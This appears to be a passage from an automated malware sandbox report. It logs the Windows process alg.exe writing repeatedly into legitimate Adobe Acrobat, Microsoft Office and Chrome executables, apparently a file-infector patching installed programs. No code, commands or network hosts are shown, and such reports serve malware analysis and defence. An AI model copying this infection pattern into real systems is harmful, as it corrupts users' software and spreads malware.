Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032588	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 12032512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 4630732	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 192512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 766028	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 765952	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 95345	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 759296	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332812	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 1332736	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 285633	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 385536	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 959052	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 958976	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 182364	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 123904	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697420	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 697344	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 66716	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1102848	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676364	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 1676288	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 753617	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 2531840	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105356	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 3105280	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 1150992	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 459776	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033292	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 1033216	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 209348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 99840	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673356	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 673280	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 69527	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 256512	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 830028	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 829952	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 72028	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 521216	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094732	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 1094656	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 321696	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 210944	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784460	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 784384	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 126840	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 13312	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586828	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 586752	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 2828	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 4785664	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359180	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 5359104	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 2430581	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 632832	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206348	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 1206272	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 206444	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 2578944	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152460	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 3152384	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 16859	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 1617920	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191436	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 2191360	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 860981	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 258048	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831564	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 831488	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 82352	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5274624	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848140	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 5848064	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 3286540	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 185344	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758860	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 758784	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 151349	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 26954240	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527756	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 27527680	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 11401068	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4392960	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966476	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 4966400	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 2843313	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 1755648	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 2329164	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 0	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 2329088	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 740604	Jump to behavior
Source: C:\Windows\System32\alg.exe	File written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe offset: 0	Jump to behavior
